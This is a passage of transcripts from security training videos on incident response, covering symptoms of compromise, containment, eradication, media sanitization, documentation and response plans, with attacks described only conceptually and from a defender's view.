IT solutions such as applying an ACL to secure data aligns with business goals because in the end, that's the
only reason IT is useful is because it solves business problems.
Now role-based responsibilities are also important for incident response and investigation because people need
to know what role they must play when an incident occurs. Now, of course, there needs to be an ongoing
evaluation of security controlled effectiveness to ensure it's still valid and doing what it's supposed to do such
as permissions to the file system or to organizational units in Active Directory.
At the management level, there are things like security policies that dictate how things are to be done and what
is acceptable and what is not. Step-by-step procedures, for instance, might be outlined for disaster recovery
plan for a specific server. So, as long as people know their roles in disaster recovery in case of a malware
infection or some kind of a malicious attack, they'll know the step-by-step procedures to get that system up and
running as quickly as possible and as efficiently as possible.
At the management level, this is ongoing task of business process improvement. There's always a way to
improve business processes. And specifically, in our case, the IT systems that support them in making sure
they're secure. And, of course, management role-based responsibilities, of course, are related to personnel for
hiring and firing and so on. At the law enforcement level in different jurisdictions, there are different rules that
would apply and are enforceable such as with cloud storage, which may or may not be allowed for certain
types of businesses in certain countries and depending upon the nature or classification of the data that's being
stored.
There's also evidence gathering for forensics especially digital forensic investigation and evidence gathering
where the chain of custody must be maintained where evidence is tracked all the time and we know who had
access to it and where it was. And, of course, there are certain applicable laws for technology solutions that
differ in different areas such as whether or not it's okay to use somebody else's open Wi-Fi.
Incident response providers also play a role. And it's also a service that you can pay for from a third party. So
we can outsource it with a service-level agreement that dictates exactly what the responsibilities of the incident
response provider are. And, in some cases if we don't have the in-house expertise, then it might actually
improve incident response time by having an external provider handle it. They might also be able to do remote
investigations over the Internet instead of having to physically be on-site.
In some cases, if required they might come on-site and they will know what digital forensics techniques to use
as well as which tools to use. And we'll be looking at some of those in some other demos.
Upon completion of this video, you will be able to describe the options for disclosing an incident.
Objectives
describe incident disclosure options
[Topic title: Incident Communication. The presenter is Dan Lachance.] Bad things happen to organizations
unfortunately, issue is how it's communicated and handled. In this video, we'll talk about incident
communication.
In some cases, communication to affected parties may be required whether those parties are the public or
affected individuals specifically or even just affected business entities. Sometimes there is limited disclosure of
exactly what happened with a negative incident that we must reveal to relevant stakeholders. Part of this is data
loss prevention or DLP where we want to make sure that we prevent the unintentional release of incident
information other than what is required and what is ethically what we should be releasing.
There are sometimes legal and regulatory requirements that determine exactly what should be notified and how
and whom should be notified. For instance, with personally identifiable information or PII as related to U.S.
HIPAA, a security breach involving more than 500 individuals must be reported. Similar issues are happening
around the world in different legislations such as with the Canada Digital Privacy Act.
So, for example, customer notification requirement might be something we have to do for credit card data
security breaches. We have to consider secure incident communication methods in the first place. We might
also be using a third-party incident response provider. So we want to have secure communication with them
after a negative incident occurs.
On the public relations or PR side, it's crucial that we have a team that relates the information that needs to be
delivered to the appropriate stakeholders properly. So as we know, it's not always what the message is but
rather how it's being delivered that has the biggest impact. So we have to think about that from the public
relations side. If there's poor communication, it could result for the company or agency in reputational damage
or irate customers – both of which are bad for business.
In this video, find out how to analyze host symptoms to determine the best response.
Objectives
[Topic title: Host Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll discuss
host symptoms and response actions.
Before we can determine what behavior is abnormal or suspicious, we've got to know what's normal. At the
host level, it's important to establish a normal usage baseline, which we compare current activity against to
detect anomalies.
Performance degradation especially over an extended period of time is an easy indication that we've got some
kind of a problem, which could even be related to, for instance, compromise or some kind of malware
infection. Unexpected configuration changes can also indicate that we've got some kind of a problem, maybe
we're infected. For example, the next time you start your web browser if the home page has been changed to
something that you know you did not change it to and you cannot revert it otherwise, you've got some kind of
an infection, maybe some kind of spyware or adware that's made the change for you – either way it's not good.
The same goes for unexpected apps that get installed in the background. Now, in some cases, when users
install free software, they just click through the wizard. They click next, next, next without really reading. And
sometimes there are additional pieces of software that get installed. However, other times unbeknown to the
user, without their consent a script or a program can run in the background. And it could result with something
being installed that we didn't want installed. Now, in some cases, it can be very difficult to remove that
installed app. Now, on a Windows client station, you couldn't revert to a system restore point, an earlier point
in time prior to the app being installed, but it's not always quite that basic especially on the server side or with
Linux.
With processor consumption, the system will slowdown. Users will probably issue or open a helpdesk ticket
quite quickly if this continues. Now sometimes the culprit could be as simple as a web browser plugin that we
didn't install, but rather installed automatically in the background. Web browser plugins give additional
functionality for reading PDFs and so on. But you may want to check your web browser plugins or even
prevent additional plugins from installing automatically to speed up your web browsing experience.
Now that's specific to a web browser but it is important. Of course, if we've got some kind of a malware
infection, that might show up as processor utilization spiking and maybe even staying spiked for periods of
time. Now what we should do is take a look at our running processes and try to isolate what is causing the
processor utilization.
Also sometimes an infected host might be used to send spam e-mail. And that's why outgoing firewalls rules
on every host should probably carefully look at SNTP traffic leaving the host to verify whether it's legitimate
or not. And that's one of the reasons why it's important that every device including smartphones have a
personal firewall installed and configured appropriately. And those things can be configured centrally. It's not
like we have to go to every device and configure the firewall, that's not the case.
Also an infected host might be used as a zombie for a distributed denial of service attack or a DDoS attack.
Now zombie, as you might guess, is an infected machine that's under malicious user control. And a botnet or a
zombie net is a collection of these computers – could be in the dozens, hundreds, even thousands – that are
under control of a malicious user. And that user can issue some kind of command set to these zombies and
have them attack, you know, a victim network or a victim computer and so on.
This is another one of those commodities actually that gets traded – if you will – on the black market, on the
Internet along with credit card numbers and PayPal credentials and so on. Once malicious users have these
zombie nets under their control, they can actually sell it to others so that others can execute DDoS attacks
against victims maybe in return asking for ransom payment and so on – either way it's all bad stuff.
Memory consumption could also be an indication of, well, poor programming. It might require simply a reboot
of the system. But it also could be a problem with a network attack of some kind. So we might have a remote
buffer overflow attack where an attacker is sending more data than the programmer intended for a specific
variable in memory.
Now, when we overwrite beyond what is allocated in memory – for example – for a variable, the potential
exists for us to gain remote administrative privileges to that system or potentially to corrupt other data beyond
what was allocated, thus causing a service of the whole host to crash or malfunction somehow. So we should
be monitoring these things – memory, CPU utilization, network traffic, and so on.
Storage space consumption is another issue on a host. Now that could be consumed legitimately by temporary
files but from a malicious standpoint. And we're talking about here being a cybersecurity analyst – an expert in
security. The host could have been compromised in the past and is now being used by an attacker to store files.
So that could be another reason why we're running out of disk space. It's another one of those aspects of
computing that should be monitored periodically.
Storage space consumption ideally would send alerts to administrators when it gets beyond a threshold – same
thing with memory, CPU, and network utilization. Unauthorized software is software that was not installed by
the user. So usually the user didn't install it or if they did intentionally install it, they thought it was something
else. It might have looked benign. So it could have been like a trojan horse piece of software, but really it's
malware.
Now, in some cases depending on your systems, it's possible for software to be installed without user consent
in the background. In the Windows world, that's precisely what User Account Control or UAC is for. It will
prompt the user. Well, it depends on the configuration. But it can be configured to prompt the user to allow
things to run in the background. The idea is we don't want things installed without user consent. Now that
being said – User Account Control – UAC is not designed to replace your malware scanners. You still need
those in addition. This just compliments them.
So unauthorized software, which users might be able to install and it might actually be what the user wants, but
not what the organization wants. This is bad news. We don't want users have any ability to install unauthorized
software that isn't approved by the company. That also goes for apps on smartphones because what happens
then is it increases the attack surface. We've got things that aren't necessary. And it just opens up the
possibility for more vulnerabilities being exported by the bad guys.
Malicious processes run in the background and usually are a result of some kind of malware infection and
certainly it can degrade system performance. They may also have a corresponding service. Or, in the case of
Linux, a daemon that runs in the background. So we should be monitoring our background services in
Windows or daemons in Linux. Every now and then what you might want to do is from the command line, get
a list of services and pipe it out to a file. Of course, you would automate this. And then periodically you would
compare the current list of running services with what you've piped out to a file.
So Windows – you might do this in PowerShell. In Linux, we might write a shell script to do it. We should
always make sure that any processes that should be running, they're allowed to be running, they're legitimate.
At the same time, we want to be careful that we don't kill any running processes that we think are nefarious
when, in fact, they are required by the operation system.
When you enable auditing...and auditing comes in many forms. You can audit, for example, the failure of log
on attempts on a server or access to delete a file whether it succeeds or fails or users creating other user
accounts. All that can be audited. So we want to use auditing to detect unauthorized changes. So we want to
make sure that we don't bypass the change management control system in place in the company where we've
got a set structure, a formal procedure for making changes.
Data exfiltration really deals with data that leaks out of the organization and is thus made available to
unauthorized users. Often this is done without user consent. And again, it could be a result of malware, could
also be a user that intentionally copies sensitive data to removable media whether or not they intend to provide
it to unauthorized users. Again, there are things that we can do to prevent this from happening or to audit this
type of activity.
Find out how to analyze network symptoms to determine the best response.
Objectives
[Topic title: Network Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll talk
about network symptoms and response actions.
Before we can detect what's not normal on the network just like with a host, we have to know what is normal.
So, ahead of time, it's crucial that we establish a normal network usage baseline – against which we compare
current activity to detect anomalies.
Now all systems on the network or an individual host or a collection of hosts could be affected by some kind of
network compromise or malware infection. So therefore, network traffic monitoring tools need to be in place.
And they come in many different forms. For example, an intrusion detection system or IDS is either an
appliance, could be virtual machine, could be a hardware appliance, or it could be software that we install that
detects anomalies and logs it or notifies administrators, but it doesn't do anything to stop it, where an intrusion
prevention system does takes steps to prevent suspicious activity from continuing.
Now naturally, IDSs and IPSs need to be configured or "trained over time" to determine what is suspicious.
Now a packet sniffer such as the free Wireshark tool or even the Linux and UNIX TCP dump command can be
used to capture network traffic. So we can see what's going on whether it's a wired network or wireless to see if
there are any abnormalities. Of course, there are ways to automate that so we don't have to do it and look of
anomalies manually.
One great symptom of a problem on a network is bandwidth consumption. Now this might be happening for
good reasons. There might be numerous streaming applications running that should be running or people might
be listening to Internet music or news at work when they should not be. Also large downloads...if an IT
administrator is downloading a DVD ISO image or Windows updates, that kind of stuff can take a lot of
bandwidth. Now, depending on your equipment and your network environment, you might be able throttle and
control what type of bandwidth is available for certain applications including downloading Windows updates
and streaming apps.
An infected host on the network could also be used for sending unsolicited spam e-mail to many e-mail
addresses elsewhere, or there could abnormal peer to peer communications over thet network. This might also
be indicative of a worm type of malware that self-propagates over the network between vulnerable hosts. So
that would show up as a bandwidth consumption on your network if your hosts are infected and being used that
way. In the same sense, if a DDoS (distributed denial of service attack) is being executed – because machines
on your network are compromised and they're actually executing the attack that again will show up as
bandwidth consumption – so like everything, we have to think that, you know, a slowdown in network
performance could be as a result of the network being used properly or improperly.
Beaconing is used by some network topologies such as token ring where stations will beacon when they don't
receive a transmission from their upstream neighbor. Now, at the same time, beaconing can be used in other
ways as a heartbeat, for example, between cluster nodes. It's used to detect when a cluster member is down
because we haven't received a heartbeat packet from it recently. So absence of our heartbeat could indicate a
problem – in this case, with a network link or a cluster node.
So network usage baselines then establish what is normal. And what you might even do is use a packet
capturing tool to capture traffic during normal business hours over time, perhaps a week and then calculate
statistics for the normal network load, number of packets in and out, the type of traffic on the wire, and so on.
So this allows for easy identification than of abnormal activity like unusual peer-to-peer communication,
which could be indicative of a worm propagating itself over the network or we might have large volumes of
traffic to or from a specific host or subnet or VLAN. That could be suspicious if we don't normally see that on
the network.
And also, we might want to make sure we have alerts in place to allow technicians to be notified when these
things are happening. Now that might be done within your operating system or with an intrusion detection or
prevention system. Then there's the issue of rogue network devices – devices that should not be on the
network. Now we can control what devices and users can get on the network in the first place – whether it's
wired or wireless – using IEEE 802.1X compliant devices like VPN appliances or Ethernet switches or
wireless access points.
So, if they conform to IEEE 802.1X, we might limit their access to the network by using a centralized
RADIUS authentication server. Now, at the same time even for the most basic Wi-Fi environment, MAC
filtering is something that we could do to limit which devices can connect. Now, of course, it's very easy to
spoof a MAC address with freely available tools but that will keep the basic people from trying to get
connected to our Wi-Fi network – certainly Wi-Fi MAC filtering – because it's not the only thing you should
do to secure wireless network. But, with defense in depth, it's always a combination of techniques.
At the same time, we don't want to have rogue DHCP servers. In the Windows Active Directory world, there's
this concept of DHCP server authorization where when a new DHCP servers brought online, it needs to be
authorized in Active Directory before it's actually active on the network. Now that doesn't stop a malicious
user from firing up a Windows host if they can get on the network in the first place and firing up a rogue
DHCP server or rogue access point. Then there's the issue of ARP cache poisoning where an attacker
essentially will fool all the machines on the network by giving them the MAC address of their malicious
station as the router.
So basically all traffic is funneled through the attacker's system and they get to see everything that way. Now
what should we be doing, at least on an ongoing periodic basis, to see if we have issues on the network,
besides running intrusion detection and prevention systems and periodically capturing network traffic. While
you might also run network scans and sweeps to discover and fingerprint network devices, for example, to
discover if new devices are on the network that were not there before that should not be.
Now also, when a network card is put into promiscuous mode when traffic is being captured on the network,
this can actually be detected. So you should make sure you have a solution that can detect this so that if we've
got a malicious user capturing network traffic, it can send an alert to us. Also we might want to track for
abnormal connections from a network device to other devices. For example, it's not normal perhaps on our
network to be probing for TCP port 22 from one host against many others. This could be indicative of some
kind of reconnaissance by malicious user looking for SSH daemons running on devices.
So this can be configured. Then, in some cases within your operating system software, you can generate alerts
or you might have the third-party tool or again it could be part of your intrusion detection and prevention
system to trigger an alarm if too many of these SSH probes, for instance, occur in a short period of time. Now
bear in mind, we have to determine whether it's abnormal or not to have many failed connections such as when
probing ports on machines or failed log in attempts. If you've established a normal usage baseline, it's going to
be pretty easy over time to detect what's abnormal.
[Topic title: Application Symptoms and Response Actions. The presenter is Dan Lachance.] In this video, I'll
talk about application symptoms and response actions.
An application usage baseline establishes what is normal for that application's usages whether it's on a single
server, multiple servers, or even its effect on the network. Once we've determined what's normal for a specific
application, then we can easily detect anomalous activity. In some cases, applications spawn other background
processes. And this could be legitimately a part of the app or it could be a result of malware being triggered in
the background.
In some cases, Failover Clustering can be used to deal with application unavailability. Failover Clustering
means we've got two or more servers working together to offer the same service. And, if one server fails, the
other server or servers can pick up the slack. For Failover Clustering to be effective, all of the nodes in the
cluster need to be using the same shared storage so that they have the same up-to-date data.
User account activity – whether it's the creation of user accounts, modification, deletion, or usage – should be
audited. Of course, we're going to have regular end user accounts for users to authenticate and access network
resources. But some applications have background services that need a specific account to run. Now we should
follow the principle of least privilege when building these service accounts to only grant the privileges
required and nothing more.
But some operating systems like Windows will allow the creation of a managed service account. This is a
secure practice because a managed service account can automatically change its password based on the domain
password change interval, whereas just building a dummy user account for the service requires administrators
to change the password for that account periodically – hopefully – and not using a password that never changes
for the service account.
Malicious users might also build user accounts that look benign. It might be a normal looking user name that
doesn't standout. And, in fact, it might be used by the malicious user as a back door. And it might even have
elevated privileges. So you might not notice this when you're just looking at user accounts especially in a large
environment with thousands of them. But, if you're auditing this, you might notice that it's strange that at three
o'clock in the morning in your timezone a new user account was created because that might not be normal.
Applications should be thoroughly tested during development and testing phases for how they behave when
they receive unexpected input because that could result in unexpected output. Fuzz testing throws lots of
random data that an app might not expect to observe its behavior to make sure it doesn't crash, reveal sensitive
information, and so on. So sometimes specially crafted input in the form of web site forms and certain data
within fields or certain network packet sent to an app can cause it to reveal certain data that it should not
otherwise.
So the transmission of private data to a third party might be revealed unintentionally. Or, in the case of a
ransomware infection, the host might periodically reach out over the Internet and contact a command and
control center where it receives instructions from a malicious user on how to proceed with encryption.
Outbound firewall rules can also be very helpful. Everyone is concerned about inbound firewall rules and
certainly they're relevant. But also at the host level and network level, outbound firewall rules should track
anomalous activity.
Is it normal that we've got our hosts contacting a certain part of the world which can be a command and control
center location for a hacker sever to receive instructions? Application service interruptions can also take the
form of denial of service attacks or Dos attacks. A DoS attack essentially renders a system unusable for
legitimate uses. It could be as simple as making a machine crash or it could be flooding a machine with
network traffic such that legitimate users can't even get in.
Now what do we do about that? You know, if we've got a web server, we're not going to block port 80 because
then legitimate users can't get into it. So there are many security solutions even in the form of hardware
appliances that will look for irregular traffic flows such as a lot of traffic coming from one host or a certain
network within a short period of time. And simply block those hosts from communicating with the application,
for example, a web app on port 80.
Memory overflows are also called buffer overflows. So what can happen is we can grant a malicious user
elevated privileges due to the fact that software might not be properly checking what's being fed into it. For
instance, a web form with a field where a user puts in a lot of extra data that isn't being validated server side
could result in elevated privileges when that's sent back to the server or it could even corrupt memory in the
application and freeze the application or even cause the operating system to hang.
Now we're not going to run around each and every host and check all of these things, instead we would use
things like host-based intrusion detection systems or host-based intrusion prevention systems. There are also
network counterparts that would be relevant if our application is distributed or has a lot to do with network
traffic. Now an intrusion detection system differs from a prevention system in that the prevention system
cannot only detect, log, and alert about suspicious activity, but a prevention system can also take steps to
prevent it from continuing.
Now you might have to configure it specifically in your environment for your specific application or over time
depending on the solution it can learn what's normal, learn what's suspicious and automatically make a
decision by itself.
[Topic title: Incident Containment. The presenter is Dan Lachance.] In this video, I'll discuss incident
containment.
So, when something negative happens, what is the incident response plan, which role do people have, and what
should they perform as tasks to contain an incident. So we're talking about stopping some kind of a malicious
attack where we can resume business operations as quickly as possible and limit damage to sensitive IT
systems and data.
An intrusion prevention system or IPS can be used at the host level or at the network level. Either way, an
intrusion prevention system will detect anomalous activity. Now that can only happen if it knows what normal
activity is for usage of an application or usage of the network. And we can configure it for our specific usage
in our environment, which is usually what is required. But intrusion prevention system cannot only detect and
log and alert administrators about issues, it can also be configured to take steps to prevent it from continuing
such as blocking firewall ports or shutting down certain services.
[The four Containment techniques are Segmentation, Isolation, Removal, and Reverse
engineering.] Containment techniques include things such as segmentation where we might isolate a machine
or an entire network from the rest of the network, for example, if we detect a malware infection. Now part of
the incident response plan might dictate that a network technician unplugs a switch from a master high-level
switch in the hierarchy to prevent the spread of a worm. There's also the removal of problems such as the
removal or eradication of malware on a machine perhaps by booting through alternative means because often
you can't really cleanse a machine correctly – at least completely and entirely – from malware infections
without booting through alternative means because sometimes operating system files themselves are infected
and spawned during startup.
In some cases, reverse engineering might also be used for incident containment to take a look at, for instance,
what a piece of malware did. So we can learn more about it to prevent future infections or to build effective
antimalware scanning tools. When containing incidents, we need to ensure that the attack is properly contained
and ideally stopped in its footsteps. So we could unplug malware infected devices or networks. We could block
wireless device connectivity, for example, by jamming transmissions or using a Faraday cage or bag. We could
also remotely wipe mobile devices that are lost or stolen to prevent data loss that is sensitive getting into the
hands of unauthorized users.
If your environment is using PKI – public key infrastructure – certificates for authentication to services, then
you could revoke the PKI certificate, for example, for a user account that we know is breached or if there's a
PKI certificate tied to a smartphone that's been lost or stolen. We can also in addition to wiping the device,
revoke the PKI certificate. Revoking a PKI certificate is similar to revoking a driver's license. It's no longer
valid and cannot be used. So this would prevent connectivity to services requiring PKI certificate
authentication.
We could also take servers that are compromised offline immediately. Now we need to have a plan in place
ahead of time so this is done properly and that we have some other way of continuing business operations such
as a failover solution being in place if we have to take a server offline. In some cases, we also need to make
sure that we preserve the integrity of evidence that might be used in the court of law. So it needs to be
admissible.
We want to make sure that evidence isn't tainted during containment. So we might generate unique hashes of
original data and then work only with copies or backups of that data. So we always have the original data at the
time it was seized in its original form.
The chain of custody needs to be followed so that we've got documentation that might also include how chain
of custody was followed such as file system hashing and preventing evidence from being tampered. We should
be able to track where evidence was, how it was contained, where it was stored, how it was moved, and so on.
And this might be required for evidence admissibility.
The removal and restoration of affected IT systems and their data is what we're concerned with here. So all
steps that we take when we eradicate a problem and recover systems and data needs to be documented. This
should also be planned ahead of time in a disaster recovery plan. There should be continuous improvement of
security controls to ensure that they are effective in protecting IT systems and data. As we know, the threat
landscape is always changing as related to IT systems. So, in response to that, we've got to continuously keep
verifying that our security mechanisms are doing their jobs.
Eradication techniques of things like infections include reconstruction or reimaging of systems, sanitization of
storage media, and secure disposal of equipment even when that equipment reaches end of life. Now let's say,
for example, that our network has been infected with ransomware. Now ransomware infections often come in
the form of some kind of phishing attack where users unwittingly open a file attachment from an e-mail
message or click on a link and then the ransomware is unleashed.
Now the ransomware will seek to encrypt files that the infected system has write access to. And, of course, if
that's an administrative station, that could be a lot of write access. So a lot of data could be encrypted. And the
malicious user will then, of course, require some kind of a ransom payment usually in the form Bitcoin before
a decryption key if it's even provided at all – would be provided.
Now, in the case of ransomware, one way to mitigate that is to restore systems. And, for that to happen,
technicians need to be aware of the incident response point and their role in it, what they should do, and the
sequence of steps they should take. So reinstallation of systems could be manual or you might use an
imagining solution to reapply images.
But, when you restore a system, you've got to make sure you've got the latest patches, you should also – of
course – immediately scan for malware, and you might even restore, or in some cases, reissue PKI certificates
if PKI certificate authentication is being used. Now still talking about the ransomware example, what about
data? It's one thing to reimage systems and get them up and running. But what about data? Well, ideally we
want to always have an offline backup location elsewhere. And that might even be in the cloud.
And we need to ensure that backups are clean. So, if we've got a ransomware infection on an administrative
station and that administrative station also has write access to the backup location – for instance – in the cloud,
then that could also mean that our cloud backup is infected with ransomware and encrypted and we can't do
anything about it. So we want to make sure our backups are clean, stored offline. And, if we have to restore it,
then we should certainly scan it for malware infections. And then, of course, when we have any type of issue,
we always need to monitor our solution to ensure that the problem has been eradicated.
So we always need to have offline backups of important data because in the case of ransomware which is
absolutely rampant these days, it won't be able to touch our offline backups. Now, in some cases, unfortunately
some people think that it might be more sensible to pay the ransom because it appears to be cheaper than
paying the IT team to do an entire system and data recovery. Bear in mind, paying a ransom never guarantees –
in this case – that you'll get a decryption key.
With sanitization, we can overwrite media with multiple passes of random data. And there are specific tools
that may have to be used depending on laws or regulations that apply to the organization. Degaussing is a
technique whereby a strong magnetic field is applied to magnetic storage media essentially to erase it. There's
always the option of remotely wiping mobile devices that are lost and stolen to prevent sensitive apps or data
from being used by unauthorized users.
There's always the factory reset of equipment to remove the configuration. This is going to be important if our
equipment has reached end of life and we might be donating it to charities or schools or selling it so it can be
used by someone else. I've seen cases where a router, for instance, purchased from eBay still has the
configuration for the network on which it was running in the past.
Sanitization completion forms are normally required to be filled out properly and submitted after, before, or
even during – in some cases – sanitization to ensure that we have a record, a paper trail essentially of
sanitization efforts. Secure disposal is also very important when it comes to things like the physical destruction
of media. Maybe that's what's required, for example, for a military institution whereby we might actually shred
storage media physically like hard disk platters or USB thumb drives or maybe they're burned or may be holes
are even drilled into disk platters rendering them unusable.
In this video, you will identify positive outcomes that have been learned from incidents.
Objectives
[Topic title: Lessons Learned. The presenter is Dan Lachance.] As people, we like to think that we learn from
past mistakes. The same is true with organizations, and their IT systems, and data. In this video, we'll talk
about lessons learned. Lessons learned rely on incident documentation so that we can prevent similar
occurrences in the future. Or if we can't prevent it, we can respond to it in a better manner. So essentially we
are learning from past events. Now one way that this works well is by holding a meeting about specific
negative incidents after it occurred. But what types of things would be discussed in this type of post-incident
meeting?
Well, one of the things we'd want to do is talk about who or what discovered the incident. We want to make
sure that this can be done early in stages, for example, with malware infections. We can also determine what
caused the incident and what the affected scope was. So if it's ransomware, for example, that might have been
caused by a user opening a file attachment that they shouldn't have opened. So user awareness and training,
once again, becomes an overall important theme. We would then look at whether or not the incident response
that took place was effective, will it be able to contain the incident, was the incident actually eradicated, what
steps were taken based on our incident response plan and was each step effective?
Are the current security controls effective or are they not – which is why we resulted in a negative incident in
the first place. Not everything is preventable. Bad things simply just happen. But sometimes we can tweak or
make changes to security controls to prevent things from happening. Lessons learned is really based on
documentation. And this needs to be a part of all incident responses, where we take a look at symptoms, the
root cause of the problem, the scope of what was affected by the incident, and each and every action taken. In
some cases, we might also use date and time stamps for this and also track who performed exactly which steps.
And certainly in the case of forensic evidence gathering for chain of custody purposes, this is going to be
especially relevant. In this video, we discussed lessons learned.
After completing this video, you will be able to recognize the impact of threats and design an incident response
plan.
Objectives
Exercise Overview
[Topic title: Exercise: Identify and Respond to Threats. The presenter is Dan Lachance.] In this exercise,
you'll start by listing examples of personally identifiable information. Following that, you'll describe the chain
of custody as well as service-level agreements. Finally, you'll then list host symptoms that prompt incident
response. Now pause the video and consider each of these four bulleted points carefully and then come back to
get some solutions.
Solution
Personally identifiable information or PII examples include bank account information, a person's driver's
license master number, an e-mail address, a date of birth, a full name, and many other items. The chain of
custody ensures evidence integrity. Documentation is required so that we can track how evidence was
gathered, how it was stored, how it's transported. We have to have all of this documented in order for data to
be considered admissible in a court of law. And, of course, the detailed rules will vary from region to region.
A service-level agreement or an SLA is a contractual document between a service provider and the service
consumer. It describes the expected levels of an IT service in the IT world with SLAs. That means looking at
things, such as uptime that is promised by a provider for a service, response time which could include how
quick something responds in terms of a technical IT solution as well as how long it takes for tech support to
respond to an issue. There are then consequences that are also listed if this contract's details are not honored.
And often that comes in the form of credits to the consumer for IT services.
Host symptoms that can prompt incident response include performance degradation, whether that is due to
most of the memory being consumed, running out of disk storage space, or CPU utilization being peaked.
Often, if there are unusual processes running in the background that you're not familiar with, it could be
indicative that there is some kind of an infection or some kind of a problem on the machine or maybe software
that was installed without the user's consent.
Also, system settings changes that weren't done by the user or by the system owner can be suspicious. Things
like the changing of the web browser default page, disabled antivirus updates when they were previously
enabled, remote desktop being turned on a Windows computer even though it was disabled previously, or even
firewall rules that look a little more relaxed and less strict than they were previously. But bear in mind, these
could be changes made by system administrator, for example, essentially through Group Policy in a Windows
environment. However, it still wants our attention.
Table of Contents
In this video, you will learn how to use OEM documentation to reverse engineer products.
Objectives
[Topic title: OEM Documentation. The presenter is Dan Lachance.] In this video, I'll discuss OEM
documentation. OEM stands for original equipment manufacturer. OEMs make a component like for a server
or a final product such as software or an OEM could generate a specific file format that is proprietary to their
use such as a PDF or it could be an operating system like Linux and so on. So OEMs are equipment
manufacturers not just physically but also in the software sense. So it's both of them.
Now we can start with the completed product or process and work backward through the end result to reverse
engineer some kind of an OEM solution. The purpose of reverse engineering is to reveal steps that were taken
to arrive at a result. And often, this is done to deconstruct some problem that we've encountered or to
deconstruct something to ensure it's been built in a secured manner.
However, OEM documentation can also be put to malicious use. Because the more that's known about some
kind of a proprietary security solution, the more vulnerable it could become. So think, for example, of an alarm
system for a facility. The more that a malicious person knows about the inner workings of that alarm system,
the more likely that he or she would be able to perhaps circumvent it. And the same type of logic applies to
hardware and software. The more the malicious users know about our network...because they might have
learned about a few network reconnaissances and what type of tools we're using and what revision or firewall
applying to that. The more that they know then the more they'll be able to pinpoint where vulnerabilities might
exist.
Proper use means that the more that's known about attacks and malware, the more effective mitigating security
controls can be. And again it all boils down to information being power. Reverse engineering can be done in an
isolated controlled environment. For example, software developers might reverse engineer malware to
determine how it behaves with the purpose of trying to prevent it from happening in the future and to eradicate
current instances of that malware. For software, of course, we would have to create backups and snapshots
prior to attempting reverse engineering.
Reverse engineering could also mean decompiling software or enabling detailed monitoring on software
solutions or even hardware solutions where we observe the behavior as we try different things against it. Of
course, we would have to create and update documentation as we proceed through the reverse engineering.
Now again, often malicious users will perform network scans and try to deduce through reverse engineering
what is being done on a network and how things are configured. In this video, we discussed OEM
documentation.
[Topic title: Network Documentation. The presenter is Dan Lachance.] In this video, I'll talk about network
documentation. Network documentation can be created either manually or we could have an automated process
such as software that scans the network and discovers devices and starts to populate information about what it
discovers. Documentation for the network should be supplied to new IT employees so that they have
familiarity with the network infrastructure and how it's being configured, what things are called, what IP
addressing is in use, and so on.
Network documentation might also be required when a security audit is being conducted. And it certainly can
be helpful when troubleshooting network performance. Network documentation can also be based on
geography where it identifies different network sites and the site connectivity linking those locations – so the
type of network link, the speed, any redundant links that might be put in place for fault tolerance as well as
internet connections along with their speeds. Now there might also be dedicated lease lines that link different
sites together, which bypass the internet altogether.
Of course, on the network, we're going to have a number of different devices like servers – both physical and
virtual – routers, switches, things like VPN appliances normally placed in a DMZ – a demilitarized zone,
firewall appliances, wireless routers. Due to the nature of having a large network potentially with a lot of users,
a lot of stations, and a lot of these types of network devices, we can see clearly that there is a need for network
documentation. The thing is that documentation has to be kept up to date. So really maintaining this
documentation is an ongoing task.
The configuration of all of these network devices also needs to be documented. Now there are some software
suites that will not only scan the network and discover what's out there but also discover some of the
configuration settings for devices or allow you to input it manually so everything is stored in one place for
your documentation.
Every network device should also have a change log. Larger companies always have a formal change
management process in place. So that before a change occurs, certain documentation must be filled in,
approval must be received before proceeding with making the changes. And so there should be a history of
what's been changed by who, when, and on which device.
The placement of all of these network devices on the network is paramount. So, when we talk about network
documentation, sometimes a visual network map can also be very useful. Network documentation must also
include these software protocols in use such as network protocols including IPv4, IPv6. We should also have
documentation that tells us whether we're using routing protocols like RIP, OSPF, or BGP. The specific
network addressing that we're using – whether it's done manually or through DHCP – must also be
documented and also these specific use of network address ranges.
Now, what that means for instance is that maybe within an address range, addresses 1 to 100 are for user
devices. But maybe 101 to 110 are for network printers. And, maybe beyond that, the rest is for other network
infrastructure equipment like router, switches, and servers. And of course, authentication requirements are part
of network documentation, what is needed to gain access to the network and resources on it.
So, for instance, is single-factor authentication used or is multi-factor authentication used? And, in some cases,
both could be. Where, when you sign in with multi-factor authentication, you gain access to different
categories of data that you wouldn't see with single-factor authentication. Network documentation will also
stipulate naming conventions that are in use for consistency reasons, things like server names, names for users,
names for different types of groups and as well group memberships and role-based access control should also
be part of the network documentation. This is especially important, again, when third party consultants are
coming in for troubleshooting or to perform an audit. And again it's very important for new IT employees to
get familiar with the network. In this video, we discussed network documentation.
After completing this video, you will be able to recognize the importance of maintaining incident response
plans.
Objectives
[Title topic: Incident Response Plan/Call List. The presenter is Dan Lachance.] When it comes to dealing with
security breaches, preparation is everything. In this video, we'll talk about an incident response plan. This type
of plan is often overlooked because essentially what we're doing with it is planning for failure in the sense that
we are planning for things that will fail and what our response to those failures will be. Where the idea is that
we want a structured approach to security breach management where everyone knows which role that they
play in the overall plan. We want to make sure that there is minimized damage to IT systems and data while at
the same time being able to resume normal business operations as quickly and efficiently as possible.
The effects of inadequate incident response plans include things such as financial loss, reputation loss, the loss
of a business partnership or contract. The incident response plan needs to be in effect before breaches occur.
And ideally, there will have been time to conduct at least one or more drills or tabletop exercises where the
involved parties know their role and know what the sequence of steps are to deal with these incidents. So
stakeholders must know their role. And there needs to be training and not just for IT technicians.
We want to make sure that there's an awareness for the general user population on the network because they
might be the ones that notify us that there is an incident that is about to occur, is occurring, or already has
occurred. There needs to be an annual review of the incident response plan at a very minimum to keep up with
changing threats. Now bear in mind that we want to make sure that we don't have things like reputation loss or
financial loss. From a PR perspective – public relations – you know, if we don't handle incidents in a
meaningful way, then it can look bad on the company. And that can degrade shareholder confidence and so on.
So, for example, if you think about the Nortel bankruptcy in 2009 that occurred because Chinese hackers
happen to have been in the network for many, many years and nobody really knows exactly what information
was gathered or what was done...but it can bring about the demise of an organization. Another part of an
incident response plan is a call list. Now the call list of course will allow us to have people that we can contact
in the event of an incident. And we make sure that we know who to contact and in which order.
Data flow diagrams that outline how data gets created and manipulated through IT systems can also be crucial
